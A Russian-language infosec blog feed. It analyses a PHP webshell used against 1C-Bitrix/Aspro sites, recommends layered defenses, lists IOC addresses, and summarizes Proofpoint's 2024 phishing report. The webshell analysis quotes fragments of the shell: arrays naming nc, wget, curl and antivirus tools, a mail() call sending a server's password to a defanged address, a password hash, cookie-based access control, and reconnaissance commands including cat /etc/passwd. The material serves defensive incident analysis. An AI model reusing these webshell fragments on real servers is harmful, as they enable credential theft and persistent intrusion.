Полешук в мире ИБ

Алексей Викторович (который Лукацкий) написал пост, почему он каждый раз готовит новую презентацию для выступления🧑‍💻

Сегодня буду выступать в бизнес-клубе и специально под аудиторию и под формат готовил новую презентацию, хотя можно было взять «дежурную». Да, из нее перенес два слайда, но потратил время для дизайна и стиля.

Правильно говорит Алексей Викторович - свою аудиторию нужно уважать😉

Крайняя контрольная точка по кейсу с разбором инцидента (честно-честно)😼

После разбора имеющейся информации и переспав с мыслями, меня не оставляет два вопроса:
➖как шелл попал на сервер?
➖почему Битрикс24 - не началась ли компания по работе с фокусом на платформу?

2️⃣Начну со второго

Нет. По данным из официального сайта Битрикс24 подвержен тем же угрозам, что и обычный веб-сайт, а именно:
Cross Site Scripting
SQL- injection
⚡PHP- injection
HTTP Response Splitting
HTML code injection
File Inclusion
Directory traversal и некоторые другие.

Важный комментарий на самом сайте:

Только системное проектирование, продумывание вопросов безопасности на всех этапах разработки и детальное тестирование готового приложения могут позволить исключить появления уязвимостей.

То есть про обеспечение безопасности было акцентировано внимание разработчиком. Значит два сценария:
❓халатное отношение
❓недостаток в безопасности

По первому: все таки проблема задетектирована, значит что-то было из СЗИ до сайта.

По второму веселее. Когда мы видим веб-шел значит киберпреступник уже провел разведку, получил первоначальный доступ, провел успешно загрузку ВПО на «нулевого пациента» и сейчас старается закрепиться в инфраструктуре для начала атаки.

Не проверял на практике свое предположение по «циклу Деминга», но в теории при грамотной эшелонированной защите логика должна была выглядеть так (+ ZTNA в помощь):
➖на уровне GeoIP мы отсекаем адреса сторонних регионов;
➖если такое невозможно проводим фокусную настройку NGFW;
➖обеспечиваем актуальность получения фидов для IDS/IPS (половина адресов в этот момент должна была быть заблокированной);
➖после снижения риска в ход идут сигнатуры WAF;
➖если WAF пропускает в ход идет EPP/EDR.

1️⃣Вот тут нужен ответ на первый вопрос: как его закинули?

Опять к теории. Есть несколько классических способов:
➖доступ к веб-сайту через «админку»;
➖доступ к файлам сайта по FTP, SSH;
➖обмануть сервер загрузив вместо картинки иной файлик (собственно, в отчете не было информации про это никакой)

Но каким бы способом не кидали бы ВПО его ОБЯЗАНЫ были увидеть потоковым антивирусом («привет» нормальному NGFW на периметре в зоне ответственности владельцев платформы) или хостовым антивирусом (тут «привет» ИБшникам организации).

Резюмирую. Битрикс24❤️ как платформа вообще не при делах. Это всего лишь точка входа для более важных для киберпреступников данных (а не просто цель закинуть «майнер»). Обеспечить безопасность можно было минимум тремя классами продуктов ИБ и не раздувать соломенкой муху💩

Несколько интересных деталей про скрипт, о котором не написали в отчете (прочитал все строки кода☺️)

Для маскировки атаки используется ORBs (области происхождения атаки) - злоумышленники запускают свои атаки не с традиционных серверов, а через домашние маршрутизаторы или другие IoT-устройства (привет китайским🇨🇳 или северокорейским🇰🇵 киберпреступникам). Это позволяет скрываться среди обычного интернет-трафика, делая их атаки более сложными для обнаружения.

Скрипт взаимодействует со следующими базами данных:
✔️MySQL (mysql_get_client_info)
✔️MSSQL (mssql_connect)
✔️PostgreSQL (pg_connect)
✔️Oracle (oci_connect)

Проверяет доступные команды и доступы - если обнаружены, они помечаются как “Userful” (полезные), “Danger” (опасные), или “Downloaders”.

Выглядит это так:

$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');

Тут видно, что скрипт проверяет антивирусное ПО и передает информацию на C2. Поэтому согласен - моя ошибка в предположении. Хотя и лучше было бы его использовать - антивирус сработал бы в режиме "пугало". Ай-ай-ай не использовать!

Скрипт умеет взаимодействовать с ОС, запуская там команды:

Windows:

dir: список файлов и папок.
netstat -an: показывает активные подключения.
net start: отображает запущенные службы.
net user: показывает учетные записи пользователей.
ipconfig /all: выводит полную информацию о сетевых настройках

Unix:

ls -lha: список

файлов с

п

о

дробной информацией.
ps aux: ото

браж

ает инф

ормацию о запущенных процессах.
find: по

иск

файлов по различным критериям, включая файлы конфигурации, файлы с определенными правами

доступа и т.д.

locate:

быстрое нахождение файлов по имени, используя предварительно проиндексированные данные.

Шел брутит доступ к БД исходя из данных /etc/passwd или из файла-словаря, который киберпреступник кидает на сервер, если что.

Поняв, что я не буду и не хочу читать 1634 строки, начал играться в динамике с кодом, собственно говоря как игрались и до меня незаблюрив код. Но если хочется, то и такое (и не такое) прочитаю.

Что там увидел:
- ссылки на классы и функции, которые используются в платформе Bitrix, а именно Bitrixx5CMain и ORM. Это классы из ядра системы Bitrix, связаны с обработкой данных. То есть я предполагаю, что атака не совсем на отдельные скрипты, а атака именно на Битрикс24 (просто срикпты могут быть не пропатчены).

- упоминание ResultIterator, Error, DB, и ArrayResult — скрипт нацелен на работу с базой данных (а не на платформу, меняя вектор угроз - вот видимо почему НЦЗПД обратило внимание, была бы угроза простого deface - думаю никому бы не было и дела).

- обнаружена команда cat /etc/passwd - интересовали кроме данных еще и пароли на сайт и платформу.

- обращение к Bitrix\Main\ORM\Data\Result. Это стандартная библиотека для работы с базой данных, где результат запроса к БД инкапсулируется в объект класса Result.

- Bitrix\Main\Type\Dictionary — это класс для работы со словарями в Bitrix. Он может содержать данные в виде ключ-значение.

- Bitrix\Main\DB\ResultIterator — это итератор для работы с результатами запроса к базе данных. Он управляет выборкой данных из БД, проходя по строкам результата.

В общем стало понятно, куда собрались атакующие - к базе данных и более уверен, что вектор этой атаки и проститимулировал НЦЗПД обратить на кейс внимание, а не просто атака, что бы всунуть майнер. Кстати, упомянув в качестве жертвы "магазин косметики" и изучив кейсы я знаю, что это был за магазин 🤩 (в нем у меня тоже карточки нет, к слову - как чувствовал).

Про вишенку чуть не забыл! 🍒

По словам расследователей было выявлены IPv4 адреса и все они опубликованы для IOC. Вот только они минимум две недели, как половина из них IOC у нормальных поставщиков данных для NGFW:

https://www.virustotal.com/gui/ip-address/204.8.96.167
https://www.virustotal.com/gui/ip-address/45.61.185.172
https://www.virustotal.com/gui/ip-address/185.220.101.15
https://www.virustotal.com/gui/ip-address/31.133.0.26
https://www.virustotal.com/gui/ip-address/185.220.100.240
https://www.virustotal.com/gui/ip-address/185.130.44.59
https://www.virustotal.com/gui/ip-address/185.40.4.100
https://www.virustotal.com/gui/ip-address/185.220.101.14
https://www.virustotal.com/gui/ip-address/45.139.122.176
https://www.virustotal.com/gui/ip-address/185.40.4.92
https://www.virustotal.com/gui/ip-address/185.220.100.253
https://www.virustotal.com/gui/ip-address/89.22.237.65
https://www.virustotal.com/gui/ip-address/178.236.247.6
https://www.virustotal.com/gui/ip-address/107.189.1.167
https://www.virustotal.com/gui/ip-address/185.244.192.175
https://www.virustotal.com/gui/ip-address/109.70.100.65
https://www.virustotal.com/gui/ip-address/185.220.100.252
https://www.virustotal.com/gui/ip-address/185.207.107.216
https://www.virustotal.com/gui/ip-address/185.220.101.36

Как по мне - работа хорошая, ребята молодцы. Но все же:
- используя нормальный NGFW с актуальными фидами можно было еще на моменте сканирования отсечь и заблокировать узлы от таких подозрительных адресов;
- на уровне даже не EPP, а потокового антивируса не разрешить загрузку шела на сервер;
- настроить WAF, добавив сигнатуры атаки, что бы исключить иных попыток.

Но а так все реально норм, молодцы еще раз

Так, давайте сразу еще раз - я никого не собираюсь обижать, унижать, дискредитировать, однако…

Однако компания «обижулек на меня» обнаружила по их классификации “цепочку взломов сайтов” через уязвимые скрипты продуктов «Аспро», которые созданы для сайтов на CMS 1С-Битрикс. Разместив на своем сайте новость и украсив их скриншотами и некоторыми данными ее сразу закрепостил себе НЦЗПД в свой ТГ-канал.

Да, информации там маловато, но что удалось увидеть это скрипт (и даже дали прямую ссылку на загрузку - решение странное, но ладно). Что в нем интересно- это форк HEUR:Backdoor.PHP.WebShell.gen которому уже 2 годика (на Virustotal его заметили 17 августа 2022 года, а на другой коммерческой TI-платформе 15 августа 2022 года).

Я же когда-то имел дело с PHP и стал люто его ненавидеть, поэтому полез во внутрь (чуть изменил, что бы не было кликабельности):


if(array_key_exists('watching',$_POST)){
$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass'];
@mail('test[@]testmail[.]com', 'root', $tmp); // Edit or delete!
}

- если в POST-запросе присутствует параметр watching, скрипт собирает данные о текущем сервере (SERVER_NAME — имя сервера, PHP_SELF — текущий исполняемый скрипт) и объединяет их с паролем, переданным через POST-запрос в параметре pass;
- после этого данные отправляются на указанный адрес электронной почты test[@]testmail[.]com

Самое смешное то, что никто не удалил или не заменил стандартные настройки - а обижульки говорят, что именно этим кодом пользовались преступники. Находясь в БД угроз его бы при загрузке на сервер заметил бы самый элементарный EPP, не говоря про потоковый антивирус. Что-то не сходится в этой истории, но идем дальше...

Пароль

$▛ = "fa769dac7a0a94ee47d8ebe021eaba9e";
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);

- переменная $▛ хранит значение, вероятно, хеша пароля. Судя по структуре, это хеш, который будет использоваться для проверки авторизации;
- переменные $▘, $▜, $▚, и $▙ имеют разные значения, связанные с настройками (например, кодировка и хеш на основе User-Agent);
- переменная $▛ — это MD5-хеш пароля, который злоумышленник использует для защиты своего вебшелла.

Cookies для контроля доступа

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
}

- это часть кода проверяет, установлен ли специальный cookie, связанный с текущим хостом. Если cookie не установлен, он генерируется с ключом, основанным на имени хоста и значении $▙ (MD5-хеш User-Agent). Это механизм контроля доступа, который позволяет вебшеллу проверять, был ли пользователь (злоумышленник) авторизован;
- rototype() может быть функцией, которая либо записывает cookie, либо выполняет другие действия для защиты вебшелла от неавторизованных пользователей.

Ооо… Dr.WEB не только взломали, но и даже допустили утечку. Дампы содержат информацию актуальную на 17 сентября 2024 года.
Вот такая история… 😐

Давно не было ревью отчета. На этот раз интересные факты из отчета 2024 State of the Phish report от Proofpoint. Все данные из отчета больше соотносятся к североамериканскому и южноамериканскому региону, но общие тренды “плюс - минус” подходят и для Европы и для нас в целом.

Основой этого отчёта является опрос 7 500 пользователей и 1 050 специалистов по безопасности, проведённый в 15 странах. Также он включает данные Proofpoint, полученные из продуктов и исследований угроз, а также выводы, сделанные на основе 183 миллионов имитированных фишинговых сообщений, отправленных клиентами компании за 12 месяцев, и более 24 миллионов писем, которые были сообщены пользователями за тот же период.

1️⃣более 1 миллиона атак совершается каждый месяц с использованием фреймворка EvilProxy для обхода MFA, но 89% специалистов по безопасности по-прежнему считают, что MFA обеспечивает полную защиту от компрометации учетных записей;
2️⃣71% пользователей совершили потенциально-опасное действие, и 96% из них знали, что делают что-то опасное;
3️⃣5% специалистов по кибербезопасности заявили, что большинство сотрудников знают о своей ответственности за безопасность, однако 59% пользователей либо не уверены в этом, либо утверждают, что они вообще не несут ответственности;
4️⃣58% пользователей делают все, что бы стать жертвами социальной инженерии.

❓Что относится к рискованным действиям:
29% — использование рабочего устройства для личных целей
26% — использование одного пароля для всех сервисов
26% — подключение без использования VPN в общественных местах
24% — ответ на сообщение (email или SMS) от незнакомого отправителя
20% — посещение потенциально-опасных сайтов
19% — переход по ссылкам или загрузка вложений от неизвестного отправителя
6% — совместное использование рабочего устройства с друзьями или семьёй
13% — звонок по незнакомому номеру, указанному в срочном письме
11% — пропуск людей в офис без предъявления бейджа (“tailgating”)
10% — загрузка конфиденциальных данных в ненадёжное облачное хранилище
9% — предоставление учётных данных ненадёжному источнику (“фишинг/вищинг”)
29% — никогда не совершали рискованных действий

👻Почему совершаются рискованные действия:
44% — это удобно
39% — чтобы сэкономить время
24% — чтобы уложиться в срочный дедлайн
19% — чтобы сэкономить деньги
11% — чтобы достичь финансовых целей
10% — чтобы выполнить другие рабочие цели
5% — другие причины

🏃‍♂️Пользователи, представляющие риск:
63% — пользователи, имеющие бизнес-привилегии и доступ к критическим данным
56% — пользователи, которые охотно кликают по ссылкам (без разбору)
56% — пользователи, которые не прошли обучение кибергигиене
49% — поставщики или бизнес-партнёры
42% — люди, увольняющиеся из компании
34% — ВИПы, руководители

⏳Время, которые сотрудники тратят на обучение (в год):
37% - 1-2 часа
25% - 31-59 минут
17% - более 4 часов
15% - 3-4 часа
6% - до 30 минут